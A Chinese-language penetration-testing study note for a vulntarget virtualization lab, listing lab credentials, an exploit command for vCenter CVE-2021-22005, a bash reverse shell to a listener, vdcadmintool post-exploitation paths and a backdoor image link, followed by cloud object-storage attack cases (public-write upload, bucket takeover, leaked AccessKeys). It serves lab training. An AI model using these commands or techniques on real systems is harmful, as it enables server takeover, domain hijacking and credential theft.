虚拟化技术

vmware esxi vcenter openstack kvm qemu 等

ESXi 是 VMware 的裸金属虚拟化 hypervisor（直接安装在物理服务器硬件上），核心功能是创建、运行和管理虚拟机；vCenter Server 是集中管理平台，用于统一管控多台 ESXi 主机及上面的所有虚拟机，实现规模化运维。

靶场 WP：

https://mp.weixin.qq.com/s/IjcURvYxbvMvBXHbxCi4aA

靶场地址：

https://github.com/crow821/vulntarget

百度云：

https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg 提取码: 2dwq

夸克网盘：

https://pan.quark.cn/s/e65bf3efbf0b?pwd=GHgE 提取码：GHgE

靶场信息：

esxi：192.168.10.128 账号：root 密码：Vulntarget@123
vcenter：192.168.10.129 账号：administrator@vsphere.local 密码：Admin@vulntarget123
Windows7：192.168.10.*（dhcp）账号：vulntarget 密码：Vulntarget

1、环境搭建

开启 VT，设置网络配置

2、攻击 vcenter 接管

vcenter（CVE-2021-22005）

https://github.com/shmilylty/cve-2021-22005-exp

攻击 vcenter 后渗透：

https://forum.butian.net/share/1987

python exp.py -s gsl.jsp -t https://192.168.10.129/
bash -i >& /dev/tcp/192.168.10.1/8888 0>&1

/usr/lib/vmware-vmdir/bin/vdcadmintool

C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe

3、克隆后门至系统后启动

后门镜像链接：

https://pan.baidu.com/s/14_OP_nePf-HUlkZxzwXkXw 提取码：k32k

案例 1：对象存储任意文件上传

打开 xxx.xxx.com 显示目录遍历 → 一般是公共可读写
尝试获取解析 oss 的 url 地址
尝试对 oss 的 url 地址进行 put 上传

案例 2：对象存储解析域名劫持

访问该域名显示 NoSuchBucket，那么只需要去阿里云存储桶重新创建一个与 HostID 一样的存储桶名称即可
随后只需要上传文件，就可以让该域名显示我们上传的任意文件

案例 3：对象存储泄漏 AccessKey

在 JS 文件中找到存在泄露的 AccessKey
在托管平台找到存在泄露的 AccessKey
在第三方组件配置不当导致泄露 AccessKey常见场景：/actuator/heapdump 堆转储文件泄露 SecretId/SecretKey
在 APP、小程序反编译中泄漏 AccessKey
利用官方 OSS 工具连接